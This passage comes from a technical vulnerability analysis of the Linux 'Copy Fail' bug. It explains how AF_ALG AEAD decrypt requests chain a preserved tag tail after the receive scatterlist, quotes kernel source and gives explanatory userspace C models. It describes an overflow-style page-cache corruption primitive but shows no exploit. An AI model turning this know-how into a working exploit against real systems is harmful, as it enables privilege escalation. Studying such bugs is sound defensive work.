* newsock->ops assigned here to allow type->accept call to override
* them when required.
*/
newsock->ops = type->ops;
For the AEAD family, type->ops points to algif_aead_ops:
static struct proto_ops algif_aead_ops = {
...
.sendmsg = aead_sendmsg,
.recvmsg = aead_recvmsg,
...
};
So after accept() returns, the fd used by userspace is already wired to AEAD-specific I/O:
control socket
════════════════════════════════════════
tfmfd
├─ bind() -> select algorithm
└─ setsockopt() -> configure transform
operation socket
════════════════════════════════════════
accept(tfmfd)
│
▼
opfd
├─ sendmsg() -> aead_sendmsg()
└─ recvmsg() -> aead_recvmsg()
For Copy Fail, the vulnerable data path is reached through the operation socket.
3.3.1.5 AEAD Request Submission
The minimal hash example in 3.3.1.1 can use plain send() and recv() because a hash request is simple:
input bytes -> digest bytes
AEAD requests carry more structure. A single request needs:
- operation direction: encrypt or decrypt
- IV: nonce / initialization vector
- AAD length: associated-data boundary
- payload bytes: plaintext or ciphertext
- tag: the authentication tag
That is why the AEAD path uses sendmsg(): the payload travels through msg->msg_iter, while request metadata travels through control messages attached to the same msghdr.
The AEAD operation table routes sendmsg(opfd, ...) into aead_sendmsg():
static int aead_sendmsg(
struct socket *sock,
struct msghdr *msg,
size_t size)
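{
...
// ivsize comes from the transform bound to the parent socket
unsigned int ivsize = crypto_aead_ivsize(tfm);
return af_alg_sendmsg(sock, msg, size, ivsize);
}
aead_sendmsg() is only the AEAD wrapper. The shared request builder is af_alg_sendmsg().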
First, it parses control messages from the user-supplied msghdr:
int af_alg_sendmsg(struct socket *sock, struct msghdr *msg, size_t size,
unsigned int ivsize)
{
...
while ((cmsg = af_alg_cmsg_send(msg, &con)) != NULL) {
switch (cmsg->cmsg_type) {
/* encrypt/decrypt selector */
case ALG_SET_OP:
ctx->op = *(u32 *)CMSG_DATA(cmsg);
break;
/* AEAD associated-data (AAD) length */
case ALG_SET_AEAD_ASSOCLEN:
/*
* Number of bytes at the start of the input
* that should be treated as AAD.
*/
ctx->aead_assoclen = af_alg_control_aead(cmsg);
break;
...
This introduces a term used throughout the rest of the post: AAD, the AEAD associated data. Whenever a kernel variable is named like aead_assoclen, it refers to the length of the AAD.
Then it converts the payload from msg->msg_iter into scatter-gather state:
iov_iter_extract_will_pin(&msg->msg_iter);
len = af_alg_make_sg(&ctx->sgl, &msg->msg_iter, 0, len);
So the request assembly is:
sendmsg(opfd, msghdr)
│
▼
aead_sendmsg()
│
▼
af_alg_sendmsg()
│
├─ control messages
│ ├─ operation direction
│ ├─ IV
│ └─ AAD length
│
└─ msg_iter payload
│
▼
scatter-gather buffers
So by the end of sendmsg(), the request is no longer just userspace socket input. It has been converted into kernel-side crypto state:
- metadata → stored in ctx
- payload → represented by scatter-gather buffers
That is the bridge Copy Fail needs. The later bug depends on what backs those scatter-gather buffers (will be introduced in 3.3.3): ordinary userspace memory, or page-backed data imported through the zero-copy splice path (see 3.2.3).
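On the userspace side, the request metadata is ordinary ancillary data attached to a msghdr. The sketch below assumes the UAPI header linux/if_alg.h is installed and a 16-byte IV; demo_build_aead_msg(), DEMO_IVLEN, and DEMO_CBUF_LEN are hypothetical names. It only fills in the msghdr for a generic AEAD request and leaves sending it to the caller.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/if_alg.h>

#ifndef SOL_ALG
#define SOL_ALG 279
#endif

#define DEMO_IVLEN 16

/* Room for three control messages: operation, IV, AAD length. */
#define DEMO_CBUF_LEN (CMSG_SPACE(sizeof(uint32_t)) + \
                       CMSG_SPACE(sizeof(struct af_alg_iv) + DEMO_IVLEN) + \
                       CMSG_SPACE(sizeof(uint32_t)))

/* cbuf must be suitably aligned for struct cmsghdr. */
static void demo_build_aead_msg(struct msghdr *msg, void *cbuf, size_t cbuf_len,
                                struct iovec *iov, uint32_t op,
                                const unsigned char *iv, uint32_t assoclen)
{
    struct cmsghdr *cmsg;
    unsigned char *data;
    uint32_t ivlen = DEMO_IVLEN;

    assert(cbuf_len >= DEMO_CBUF_LEN);
    memset(msg, 0, sizeof(*msg));
    memset(cbuf, 0, cbuf_len);  /* no stale lengths for CMSG_NXTHDR to trip on */
    msg->msg_iov = iov;         /* payload bytes travel through the iterator */
    msg->msg_iovlen = 1;
    msg->msg_control = cbuf;
    msg->msg_controllen = DEMO_CBUF_LEN;

    /* 1. operation direction: ALG_OP_ENCRYPT or ALG_OP_DECRYPT */
    cmsg = CMSG_FIRSTHDR(msg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_OP;
    cmsg->cmsg_len = CMSG_LEN(sizeof(op));
    memcpy(CMSG_DATA(cmsg), &op, sizeof(op));

    /* 2. IV, laid out like struct af_alg_iv: length word, then the bytes */
    cmsg = CMSG_NXTHDR(msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv) + DEMO_IVLEN);
    data = CMSG_DATA(cmsg);
    memcpy(data, &ivlen, sizeof(ivlen));
    memcpy(data + offsetof(struct af_alg_iv, iv), iv, DEMO_IVLEN);

    /* 3. AAD length: how many leading payload bytes are associated data */
    cmsg = CMSG_NXTHDR(msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
    cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));
    memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));
}
```

A caller would typically declare the control buffer inside a union with a struct cmsghdr member to get the alignment right, point iov at the payload, and pass the finished msghdr to sendmsg() on the operation socket.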
3.3.2 AEAD Buffer Contract
Before we reach the final scatter-gather (scatterlist) representation, we need to understand the logical AEAD buffer contract. The kernel does not immediately treat the queued bytes as an arbitrary scatterlist; it first interprets them as an AEAD request with a strict layout:
AAD || payload || optional tag
This is a logical layout, not a single structure in contiguous memory. It defines the buffer boundaries that matter for the memory corruption.
Therefore, after sendmsg() queues request bytes and records ctx->aead_assoclen, recvmsg() has to interpret those bytes according to that AEAD contract:
- AAD is authenticated but not encrypted
- payload is plaintext for encryption, ciphertext for decryption
- tag is produced during encryption and consumed during decryption
So the layout depends on the request direction:
encrypt:
input = AAD || plaintext
output = AAD || ciphertext || tag
decrypt:
input = AAD || ciphertext || tag
output = AAD || plaintext
That split appears directly in _aead_recvmsg():
static int _aead_recvmsg(
struct socket *sock,
struct msghdr *msg,
size_t ignored,
int flags)
{
...
/* AEAD authentication tag size */
unsigned int as = crypto_aead_authsize(tfm);
...
/*
* Total bytes queued earlier through sendmsg().
*
* Encrypt input:
* AAD || plaintext
*
* Decrypt input:
* AAD || ciphertext || tag
*/
used = ctx->used;
/*
* outlen is the size of the recvmsg-side output buffer needed.
*
* Encrypt:
* output = AAD || ciphertext || tag
* outlen = input + tag
*
* Decrypt:
* output = AAD || plaintext
* outlen = input - tag
*/
if (ctx->enc)
outlen = used + as; // 1 encryption
else
outlen = used - as; // 2 decryption
/*
* Rebase "used" from total input length to crypto payload length.
*
* AAD is not encrypted/decrypted, so it is removed here and stored
* separately as req->assoclen through aead_request_set_ad().
*
* After this:
*
* Encrypt:
* used = plaintext length
*
* Decrypt:
* used = ciphertext || tag length
*/
used -= ctx->aead_assoclen;
...
}
The comments give the two pieces of bookkeeping we care about:
- outlen → recvmsg-side output size
- used → AEAD crypto payload length after removing AAD
For Copy Fail, the decrypt case is the critical one:
AEAD decrypt contract
════════════════════════════════════════════════════════════
input queued through sendmsg():
┌────────────┬────────────────────┬────────────┐
│ AAD │ ciphertext │ tag │
└────────────┴────────────────────┴────────────┘
0 assoclen assoclen+ctlen +authsize
decrypts to verifies only
│ │
▼ ×
output prepared for recvmsg():
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
0 assoclen assoclen+ptlen
▲
│
valid output boundary
The tag is part of the decrypt input because the AEAD algorithm needs it for authentication. But it is not part of the decrypt output.
That boundary matters later in 3.3.4.3: the valid decrypt output ends after AAD || plaintext, while the original decrypt input still had a tag after AAD || ciphertext. Copy Fail becomes possible when the request construction preserves that tag tail after the output region and a later algorithm-side write crosses into it.
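The length bookkeeping is easy to check with concrete numbers. The helper below is a userspace restatement of the outlen and used arithmetic quoted from _aead_recvmsg(); the struct, the function name, and the early sufficiency check are my own additions for the sketch, not kernel code.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_aead_lens {
    size_t outlen;  /* recvmsg-side output size */
    size_t used;    /* crypto payload length after removing AAD */
};

/*
 * queued:   total bytes submitted through sendmsg()
 * assoclen: AAD length
 * authsize: tag length
 * Returns false when the input cannot hold the AAD (plus the tag on decrypt).
 */
static bool toy_aead_compute(bool enc, size_t queued, size_t assoclen,
                             size_t authsize, struct toy_aead_lens *out)
{
    size_t min_in = assoclen + (enc ? 0 : authsize);

    assert(out != NULL);
    if (queued < min_in)
        return false;

    /* encrypt appends a tag to the output; decrypt strips it */
    out->outlen = enc ? queued + authsize : queued - authsize;
    /* AAD is tracked separately, so it leaves the payload count */
    out->used = queued - assoclen;
    return true;
}
```

For a decrypt request with 8 bytes of AAD, 16 bytes of ciphertext, and a 16-byte tag, the input is 40 bytes, so outlen is 24 and used is 32. The 16-byte gap between the input and outlen is exactly the tag tail that sits past the valid output boundary.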
3.3.3 Scatterlist Through Scatterwalk
At the AEAD level, the logical buffer boundary is now clear. The next question is why a helper can read or write past one backing region and continue into another.
The answer is that the crypto layer does not require one flat contiguous buffer. The walker (scatterwalk) commonly operates on a scatterlist chain: a list of page-backed byte ranges treated as one continuous logical stream.
3.3.3.1 Logical View
The crypto layer may see one logical buffer:
logical crypto buffer
════════════════════════════════════════════════════════════
0 end
│ [logical byte stream] │
▼ ▼
┌───────────────┬──────────────────┬──────────────────────┐
│ AAD │ ciphertext │ tag │
└───────────────┴──────────────────┴──────────────────────┘
But underneath, that stream can be backed by several independent scatterlist entries:
scatterlist backing
════════════════════════════════════════════════════════════
┌───────────────┐ ┌───────────────┐ ┌──────────────────────┐
│ sg entry #0 │ │ sg entry #1 │ │ sg entry #2 │
│ user page │ │ user page │ │ file-backed page │
└───────┬───────┘ └──────┬────────┘ └────────┬─────────────┘
│ │ │
▼ ▼ ▼
┌───────────────┬──────────────────┬──────────────────────┐
│ AAD │ ciphertext │ tag │
└───────────────┴──────────────────┴──────────────────────┘
An "sg entry" means one struct scatterlist entry. The critical idea is that the crypto layer can treat these separate backing regions as one logical byte stream.
3.3.3.2 Scatterlist Entry Layout
The core object is struct scatterlist:
struct scatterlist {
unsigned long page_link; // encoded page pointer + flags
unsigned int offset; // byte offset inside the page
unsigned int length; // number of bytes available
dma_addr_t dma_address;
...
};
Conceptually, one scatterlist entry means:
this logical range lives at: page + offset, for length bytes
So a scatterlist entry is not a malloc-style buffer. It is a descriptor for a byte range inside a page.
The page attachment is made explicit by sg_set_page():
/**
* sg_set_page - Set sg entry to point at given page
* @sg: SG entry
* @page: The page
* @len: Length of data
* @offset: Offset into page
*
* Description:
* Use this function to set an sg entry pointing at a page, never assign
* the page directly. We encode sg table information in the lower bits
* of the page pointer. See sg_page() for looking up the page belonging
* to an sg entry.
*
**/
static inline void sg_set_page(struct scatterlist *sg, struct page *page,
unsigned int len, unsigned int offset)
{
sg_assign_page(sg, page); // attach backing page
sg->offset = offset; // start offset inside page
sg->length = len; // valid byte length
}
3.3.3.3 Scatterlist Chaining
Multiple entries can be connected through sg_chain(), which calls __sg_chain():
#define SG_CHAIN 0x01UL
#define SG_END 0x02UL
static inline void sg_chain(
struct scatterlist *prv,
unsigned int prv_nents,
struct scatterlist *sgl)
{
__sg_chain(&prv[prv_nents - 1], sgl);
}
static inline void __sg_chain(struct scatterlist *chain_sg,
struct scatterlist *sgl)
{
/*
* offset and length are unused for chain entry. Clear them.
*/
chain_sg->offset = 0;
chain_sg->length = 0;
/*
* Set lowest bit to indicate a link pointer, and make sure to clear
* the termination bit if it happens to be set.
*/
chain_sg->page_link = ((unsigned long) sgl | SG_CHAIN) & ~SG_END;
}
The resulting shape is:
scatterlist chain
═══════════════════════════════════
┌────────────────────────────┐
│ sg #0 │
│ page = user page A │
│ offset = 0x120 │
│ length = 0x300 │
└──────────────┬─────────────┘
│ sg_next()
▼
┌────────────────────────────┐
│ sg #1 │
│ page = user page B │
│ offset = 0x000 │
│ length = 0x700 │
└──────────────┬─────────────┘
│ sg_next()
▼
┌────────────────────────────┐
│ sg #2 │
│ page = file-backed page │
│ offset = 0x200 │
│ length = 0x010 │
└────────────────────────────┘
A consumer of this chain can walk from sg #0 into sg #1, then into sg #2, as if all entries formed one continuous buffer, while they are actually "scattered".
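To make the "one continuous buffer" idea concrete, here is a minimal userspace sketch, not kernel code. The `struct sg_model` type and the `sg_model_resolve()` helper are hypothetical names invented for illustration; they only mimic how a logical offset maps onto a chain of (page, offset, length) descriptors.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical userspace stand-in for one scatterlist entry. */
struct sg_model {
    unsigned char *page;   /* backing page (unused by the lookup itself) */
    size_t offset;         /* start offset inside the page */
    size_t length;         /* valid byte length of this entry */
    struct sg_model *next; /* next entry in the chain, or NULL */
};

/*
 * Resolve a logical stream offset to the entry that contains it.
 * On success, *in_entry receives the offset relative to that entry's range.
 * Returns NULL when the offset lies at or beyond the end of the chain.
 */
struct sg_model *sg_model_resolve(struct sg_model *sg, size_t logical,
                                  size_t *in_entry)
{
    assert(in_entry != NULL);

    while (sg != NULL) {
        if (logical < sg->length) {
            *in_entry = logical;
            return sg;
        }
        logical -= sg->length; /* skip this entry entirely */
        sg = sg->next;
    }
    return NULL;
}
```

With the lengths from the diagram (0x300, 0x700, 0x010), logical offset 0x300 resolves to the first byte of sg #1 and 0xa00 to the first byte of sg #2, the file-backed entry. The caller never sees the boundary unless it checks for it.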
3.3.3.4 Scatterwalk Mechanics
That is where scatterwalk enters the picture.
scatterwalk_map_and_copy() copies bytes into or out of a scatterlist chain starting at a logical offset:
void scatterwalk_map_and_copy(void *buf, struct scatterlist *sg,
unsigned int start, unsigned int nbytes, int out)
{
struct scatter_walk walk;
struct scatterlist tmp[2];
// jump to the sg entry containing logical offset "start"
sg = scatterwalk_ffwd(tmp, sg, start);
// start walking from that entry
scatterwalk_start(&walk, sg);
// copy nbytes across one or more sg entries
scatterwalk_copychunks(buf, &walk, nbytes, out);
scatterwalk_done(&walk, out, 0);
}
The helper does not operate against one flat allocation. It fast-forwards to a logical offset, then copies across the scatterlist stream.
When the current entry is exhausted, the walker can continue into the next entry. The transition happens through scatterwalk_done() → scatterwalk_pagedone():
static inline void scatterwalk_done(struct scatter_walk *walk, int out,
int more)
{
/*
* Finish the current page/chunk when:
*
* - there is no more data to copy, or
* - the current scatterlist entry is exhausted, or
* - the walk reached a page boundary
*/
if (!more ||
walk->offset >= walk->sg->offset + walk->sg->length ||
!(walk->offset & (PAGE_SIZE - 1)))
scatterwalk_pagedone(walk, out, more);
}
static inline void scatterwalk_pagedone(struct scatter_walk *walk, int out,
unsigned int more)
{
/*
* If data was written into the backing page,
* flush the data cache for coherency.
*/
if (out) {
struct page *page;
page = sg_page(walk->sg) +
((walk->offset - 1) >> PAGE_SHIFT);
flush_dcache_page(page);
}
/*
* If more bytes remain and the current scatterlist entry
* has been fully consumed, move to the next entry:
*
* current sg entry -> sg_next(current sg entry)
*/
if (more &&
walk->offset >= walk->sg->offset + walk->sg->length)
scatterwalk_start(walk, sg_next(walk->sg)); // [!]
}
The important line is:
scatterwalk_start(walk, sg_next(walk->sg));
Meaning:
current sg entry
│
│ sg_next()
▼
next sg entry
│
│ scatterwalk_start()
▼
copy continues there
So if one entry ends and another entry is chained after it, scatterwalk can keep moving.
sg #0 sg #1
┌────────────────────────────┐ ┌────────────────────────────┐
│ AAD || plaintext │ │ tag / scratch / next bytes │
└────────────────────────────┘ └────────────────────────────┘
│
└── sg_next(sg #0)
3.3.3.5 Output-boundary Crossing
This is the property Copy Fail needs.
From the helper's point of view, the target is only:
sg = logical offset + length inside a scatterlist chain
It does not inherently know that one entry is legitimate decrypt output while the next entry may be a borrowed pipe/page-cache-backed page.
The dangerous shape is:
destination scatterlist
══════════════════════════════════════════════════════════════
valid output area sg_next() chained entry
┌────────────────────────────┐ ┌────────────────────────────┐
│ sg #0 │ │ sg #1 │
│ legitimate AEAD output │───▶│ page-cache-backed file page│
│ AAD || plaintext │ │ must not receive writes │
└────────────────────────────┘ └────────────────────────────┘
▲
│
valid output ends here
For AEAD decryption, the valid output boundary is:
AAD length (assoclen) + plaintext length
The authentication tag belongs to the input:
AAD || ciphertext || tag
but not to the output:
AAD || plaintext
So if crypto code writes past the valid decrypt output boundary, scatterwalk can mechanically follow sg_next() into the next scatterlist entry.
That is why scatterlists matter here: they turn separate backing regions into one logical byte stream, and the walker follows that stream mechanically.
So, from an attacker's point of view, the question becomes:
Does any kernel code write through a scatterlist past the end of the valid output, in an "overflow"-style pattern?
If yes, and if the next chained entry is page-cache-backed, that write can stop being ordinary buffer handling and become an overflow-style page-cache corruption primitive.
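The boundary-crossing behaviour can be reproduced in a small userspace model. This is a sketch under stated assumptions, not the kernel's scatterwalk: `struct chain_seg` and `chain_write()` are hypothetical names, and plain byte arrays stand in for pages. It shows only that a writer addressing a logical offset has no notion of which segment "owns" the bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a chained scatterlist segment. */
struct chain_seg {
    unsigned char *buf;     /* backing bytes of this segment */
    size_t length;          /* number of valid bytes */
    struct chain_seg *next; /* next segment, or NULL */
};

/*
 * Write nbytes from src into the chain at logical offset start.
 * Returns the number of bytes actually written.
 */
size_t chain_write(struct chain_seg *seg, size_t start,
                   const unsigned char *src, size_t nbytes)
{
    size_t written = 0;

    /* Fast-forward to the segment containing the start offset. */
    while (seg != NULL && start >= seg->length) {
        start -= seg->length;
        seg = seg->next;
    }

    /* Copy, stepping into the next segment when the current one is full. */
    while (seg != NULL && written < nbytes) {
        size_t room = seg->length - start;
        size_t left = nbytes - written;
        size_t n = left < room ? left : room;

        memcpy(seg->buf + start, src + written, n);
        written += n;
        start = 0;
        seg = seg->next;
    }
    return written;
}
```

If the head segment models a 16-byte output buffer and the tail models a borrowed page, a 4-byte write at logical offset 16 lands entirely in the tail, and the head is left untouched.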
3.3.4 AEAD Request Scatterlist Construction
3.3.4.1 Socket SGLs and Crypto Request SGLs
The previous section established that scatterwalk can traverse a scatterlist chain. The missing link is the builder:
Which code constructs the scatterlist chain consumed by the AEAD implementation?
That bridge is _aead_recvmsg(), reached through the AEAD operation socket created by accept().
The kernel source file algif_aead.c describes the model in terms of two socket-side scatterlists, TX and RX:
/*
* ...
*
* The following concept of the memory management is used:
*
* The kernel maintains two SGLs, the TX SGL and the RX SGL. The TX SGL is
* filled by user space with the data submitted via sendmsg (maybe with
* MSG_SPLICE_PAGES). Filling up the TX SGL does not cause a crypto operation
* -- the data will only be tracked by the kernel. Upon receipt of one recvmsg
* call, the caller must provide a buffer which is tracked with the RX SGL.
*
* During the processing of the recvmsg operation, the cipher request is
* allocated and prepared. As part of the recvmsg operation, the processed
* TX buffers are extracted from the TX SGL into a separate SGL.
*
* ...
*/
The socket-side meaning is:
- TX SGL:
  - transmit-side scatterlist
  - data queued through sendmsg()
  - may include MSG_SPLICE_PAGES-backed entries (see 3.2.4.2)
- RX SGL:
  - receive-side scatterlist
  - destination buffer supplied by recvmsg() for the operation result
During recvmsg(), _aead_recvmsg() translates those socket buffers into a crypto-layer request object struct aead_request:
struct aead_request {
struct crypto_async_request base;
unsigned int assoclen; /* AAD length */
unsigned int cryptlen; /* payload length */
u8 *iv; /* IV / nonce */
struct scatterlist *src; /* input scatterlist */
struct scatterlist *dst; /* output scatterlist */
void *__ctx[] CRYPTO_MINALIGN_ATTR;
};
The naming transition is:
AF_ALG socket layer crypto request layer
─────────────────── ────────────────────
TX SGL ─────────────────────────▶ req->src
data submitted by sendmsg() input scatterlist
RX SGL ─────────────────────────▶ req->dst
buffer supplied to recvmsg() output scatterlist
So _aead_recvmsg() is the conversion point:
sendmsg() data ─► socket TX SGL ─► req->src
recvmsg() buffer ─► socket RX SGL ─► req->dst
The decrypt path is the dangerous one (covered in 3.3.4.3). The authentication tag must remain available as input through req->src, but it is not part of the valid decrypt output in req->dst. That mismatch makes the later scatterlist chaining security-sensitive.
3.3.4.2 Encryption Request Layout
For encryption, the AEAD contract is:
input = AAD || plaintext
output = AAD || ciphertext || tag
Inside _aead_recvmsg(), the encryption branch first copies the queued TX input into the RX destination scatterlist:
if (ctx->enc) {
/*
* Encryption operation - The in-place cipher operation is
* achieved by the following operation:
*
* TX SGL: AAD || PT
* | |
* | copy |
* v v
* RX SGL: AAD || PT || Tag
*/
/*
* Step 1:
* Copy AAD || plaintext from TX into RX.
*
* At this point, RX contains the input material and has
* enough space for the tag that will be produced later.
*/
err = crypto_aead_copy_sgl(
null_tfm,
tsgl_src, // source: queued TX input
areq->first_rsgl.sgl.sgt.sgl, // destination: RX output
processed // bytes copied into RX
);
...
/*
* Step 2:
* Consume the TX entries that were copied.
*/
af_alg_pull_tsgl(sk, processed, NULL, 0);
} else ...
At this stage, RX contains AAD || plaintext and also has room for the authentication tag. The tag is not generated by af_alg_pull_tsgl() at step 2; it is produced later when the prepared request is submitted through crypto_aead_encrypt():
/*
* Later:
* submit the prepared AEAD request.
*
* In the encryption case, the algorithm transforms plaintext into
* ciphertext and writes the authentication tag into the RX destination.
*/
crypto_aead_encrypt(&areq->cra_u.aead_req);
Conceptually:
encryption sgl setup
══════════════════════════════════════════════════════
TX SGL RX SGL
┌─────────┬───────────┐ copy ┌───────┬───────────┬───────────┐
│ AAD │ plaintext │ ──────▶ │ AAD │ plaintext │ tag space │
└─────────┴───────────┘ └───────┴───────────┴───────────┘
│ later becomes
│ │ │
│ │ │ written by
│ │ encrypt │ crypto_aead_encrypt()
│ ▼ ▼
│ ciphertext tag
│ ▲
▼ │
AAD │
│ │
└──── authenticated ────┘
So the encryption path is straightforward: copy AAD || plaintext from TX into RX, consume the copied TX entries, then let the AEAD algorithm produce ciphertext || tag in the RX destination.
3.3.4.3 Decryption Request Layout
Decryption is the security-sensitive case.
For decryption, the input layout is:
AAD || ciphertext || tag
but the legitimate output layout is only:
AAD || plaintext
The tag is required for authentication, but it must not be emitted as output. That creates the layout problem: the crypto request still needs the tag as input, while the destination should end before the tag.
The decrypt branch in _aead_recvmsg() solves this by copying the output-sized head into RX, preserving the TX tag tail, and chaining that tag tail after RX:
} else {
/*
* Decryption operation - To achieve an in-place cipher
* operation, the following SGL structure is used:
*
* TX SGL: AAD || CT || Tag
* | | ^
* | copy | | Create SGL link.
* v v |
* RX SGL: AAD || CT ----+
*/
/*
* Step 1:
* Copy only the decrypt output-sized prefix from TX into RX.
*
* TX contains: AAD || CT || Tag
* RX receives only: AAD || CT
*
* The tag is intentionally not copied into RX output.
*/
err = crypto_aead_copy_sgl(
null_tfm,
tsgl_src, // source: queued TX input
areq->first_rsgl.sgl.sgt.sgl, // destination: RX output
outlen // copy only AAD || CT
);
if (err)
goto free;
/*
* Step 2:
* Count how many TX scatterlist entries cover the tag tail.
*
* processed = total TX input length
* processed - as = start offset of authentication tag
*/
areq->tsgl_entries = af_alg_count_tsgl(
sk,
processed,
processed - as
);
...
/*
* Step 3:
* Preserve the tag tail from the TX.
*
* The tag remains available as decrypt input, but it is not
* copied into the RX output buffer.
*/
af_alg_pull_tsgl(
sk,
processed,
areq->tsgl, // stores preserved TX tag entries
processed - as // start of tag region
);
...
/*
* Step 4:
* Chain the preserved TX tag entries after the RX scatterlist.
*
* Before:
*
* RX SGL: [ AAD || CT ]
*
* TX SGL: [ AAD || CT || Tag ]
* ^
* |
* preserved tag tail
*
* After sg_chain():
*
* request SGL:
*
* [ RX: AAD || CT ] ---> [ TX: Tag ]
*
* The tag remains input material, but it is now linked after
* the RX-side scatterlist as part of one logical chain.
*/
sg_chain(
sg, // RX scatterlist segment to extend
sgl_prev->sgt.nents + 1, // number of RX entries including chain slot
areq->tsgl // preserved TX tag scatterlist
);
}
The three relevant values are:
processed = total queued TX input length
as = AEAD authentication tag size
outlen = processed - as
So for decryption:
outlen = AAD length + ciphertext length
= valid decrypt output-sized prefix
The preserved tag begins at:
processed - as
That means _aead_recvmsg() builds two pieces:
RX head
recvmsg() destination
contains output-sized prefix:
AAD || ciphertext
TX tag tail
preserved sendmsg() tail
contains authentication tag
After sg_chain(), those pieces are no longer isolated. The RX scatterlist is extended so that walking past its end reaches the preserved TX tag entries:
decrypt request scatterlist
═════════════════════════════════════════════════════════════════════
valid output-sized head preserved input tail
┌────────────────────────────┐ ┌────────────────────────────┐
│ RX SGL │ │ TX tag SGL │
│ recvmsg() destination │ ──────▶ │ authentication tag bytes │
│ AAD || ciphertext │ sg_next │ from sendmsg() │
└────────────────────────────┘ └────────────────────────────┘
During actual decryption, the AAD || ciphertext region becomes the valid AAD || plaintext output. The chained TX tag tail remains input material for authentication:
semantic decrypt layout
═════════════════════════════════════════════════════════════════════
valid decrypt output preserved input-only tag
┌────────────────────────────┐ ┌────────────────────────────┐
│ AAD || plaintext │ ──────▶ │ tag │
│ belongs to RX output │ sg_next │ belongs to TX input │
└────────────────────────────┘ └────────────────────────────┘
This design is intentional: AEAD decryption still needs the tag, but the tag is not part of the output returned to userspace.
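The copy-the-head, link-the-tail construction can be modeled in userspace as follows. This is a sketch, not the code from algif_aead.c: `struct dec_seg` and `build_decrypt_chain_model()` are hypothetical names, and flat byte arrays stand in for the TX and RX scatterlists. The point it illustrates is that only the output-sized prefix is copied, while the tag tail keeps pointing at the original TX memory.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for a scatterlist segment. */
struct dec_seg {
    unsigned char *buf;
    size_t len;
    struct dec_seg *next;
};

/*
 * tx holds AAD || CT || Tag ("processed" bytes in total); "as" is the tag size.
 * The head is copied into rx_buf. The tag tail is linked by reference only.
 */
void build_decrypt_chain_model(struct dec_seg *rx, struct dec_seg *tag,
                               unsigned char *rx_buf, size_t rx_cap,
                               unsigned char *tx, size_t processed, size_t as)
{
    size_t outlen;

    assert(processed >= as);
    outlen = processed - as;    /* length of AAD || CT */
    assert(outlen <= rx_cap);

    memcpy(rx_buf, tx, outlen); /* step 1: copy the output-sized prefix */

    tag->buf = tx + outlen;     /* steps 2-3: keep the tag tail, no copy */
    tag->len = as;
    tag->next = NULL;

    rx->buf = rx_buf;           /* step 4: chain the tag tail after RX */
    rx->len = outlen;
    rx->next = tag;
}
```

After the call, `rx->buf` is private receive memory, but `tag->buf` still aliases whatever memory backed the TX tail. That aliasing is what matters once the TX side can be backed by spliced pages.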
The security-sensitive part is the chain boundary. Once RX and the preserved TX tag tail are chained, a scatterlist walker can cross from the valid output region into the tag entry:
valid decrypt output ends
│
▼
┌────────────────────┐ ┌──────────────────────────┐
│ RX SGL │───────▶ │ preserved TX tag SGL │
│ AAD || plaintext │ sg_next │ authentication tag bytes │
└────────────────────┘ └──────────────────────────┘
^
can we overflow from here?
At this point, chaining alone is not the bug. The chain becomes dangerous only if later code performs a destination-side write at the boundary where the valid decrypt output ends. That is exactly what the buggy AEAD implementation authencesn does, as section 3.4 shows.
3.3.4.4 Final AEAD Request Wiring
Before entering the selected AEAD implementation, _aead_recvmsg() stores the prepared scatterlist layout into the final struct aead_request.
Two helpers do the wiring.
aead_request_set_crypt() assigns the input/output scatterlists, payload length, and IV:
static inline void aead_request_set_crypt(struct aead_request *req,
struct scatterlist *src,
struct scatterlist *dst,
unsigned int cryptlen, u8 *iv)
{
req->src = src;
req->dst = dst;
req->cryptlen = cryptlen;
req->iv = iv;
}
aead_request_set_ad() stores the AAD length:
static inline void aead_request_set_ad(struct aead_request *req,
unsigned int assoclen)
{
req->assoclen = assoclen;
}
In _aead_recvmsg(), the final request is initialized like this:
/* Initialize the crypto operation */
aead_request_set_crypt(
&areq->cra_u.aead_req, // AEAD request object being prepared
rsgl_src, // source SGL:
// logical AEAD input
// aka: AAD || ciphertext || tag
areq->first_rsgl.sgl.sgt.sgl, // destination SGL:
// recvmsg-side output buffer
// aka: AAD || plaintext
used, // cryptlen:
// crypto payload length excluding AAD
// aka: ciphertext || tag length
ctx->iv // IV / nonce for AEAD operation
);
aead_request_set_ad(
&areq->cra_u.aead_req, // same AEAD request object
ctx->aead_assoclen // assoclen: length of AAD prefix
);
So the assignment is:
&areq->cra_u.aead_req -> req
rsgl_src -> req->src
areq->first_rsgl.sgl.sgt.sgl -> req->dst
used -> req->cryptlen
ctx->iv -> req->iv
ctx->aead_assoclen -> req->assoclen
_aead_recvmsg() builds an in-place decrypt request:
- req->src: AEAD input, AAD || ciphertext || tag
- req->dst: AEAD output, AAD || plaintext
To make that work, _aead_recvmsg() reuses the RX head and links the preserved TX tag tail after it:
AEAD decrypt request
════════════════════════════════════════════════════════════
shared RX head preserved TX tail
┌──────────────────────┐ ┌────────────────┐
req->src ──▶ │ AAD || ciphertext │ ───────▶ │ tag │
└──────────────────────┘ └────────────────┘
▲
│
req->dst ────────────────┘
writes output here:
AAD || plaintext
So the same RX head participates in two views:
req->src reads:
RX head || TX tag tail
AAD || ciphertext || tag
req->dst writes:
RX head only
AAD || plaintext
Visually:

The valid decrypt output ends inside the RX head:
RX head
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
▲
│
valid output boundary
But the chained request still has a next entry after that boundary:
RX head preserved TX tail
┌────────────┬────────────────┐ ┌────────────┐
│ AAD │ plaintext area │ │ tag │
└────────────┴────────────────┘ └────────────┘
▲ ▲
│ │
valid output ends reachable through sg_next()
